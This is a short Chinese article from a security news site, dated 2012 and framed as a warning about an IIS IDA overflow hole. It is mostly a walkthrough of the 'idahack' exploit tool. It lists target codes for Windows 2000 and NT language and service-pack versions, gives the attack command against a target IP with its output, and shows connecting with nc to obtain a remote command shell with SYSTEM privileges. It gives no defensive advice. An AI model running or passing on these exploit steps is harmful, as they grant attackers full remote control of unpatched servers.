漏洞警告之非常危险的IDA溢出漏洞
来源:中国安全信息网 更新时间:2012-04-13
              

所用程序:idahack。

进入MS-DOS方式,这里假设idq.exe位于c:\下,













c:\idahack.exe 
运行参数:c:\idahack 
chinese win2k : 1 
chinese win2ksp1: 2 
chinese win2ksp2: 3 
english win2k : 4 
english win2ksp1: 5 
english win2ksp2: 6 
japanese win2k : 7 
japanese win2ksp1: 8 
japanese win2ksp2: 9 
korea win2k : 10 
korea win2ksp1: 11 
korea win2ksp2: 12 
chinese nt sp5 : 13 
chinese nt sp6 : 14 

c:\idahack IP 80 1 80 
connecting... 
sending... 
Now you can telnet to 80 port

好,现在你可以telnet它的80端口了,我们用NC来连接。

C:\nc 127.0.0.1 80 

Microsoft Windows 2000 [Version 5.00.2195] 
(C)版权所有 1985-1998 Microsoft Corp 
C:\WINNT\system32>

现在我们上来了,也可IDQ一样是SYSTEN权限。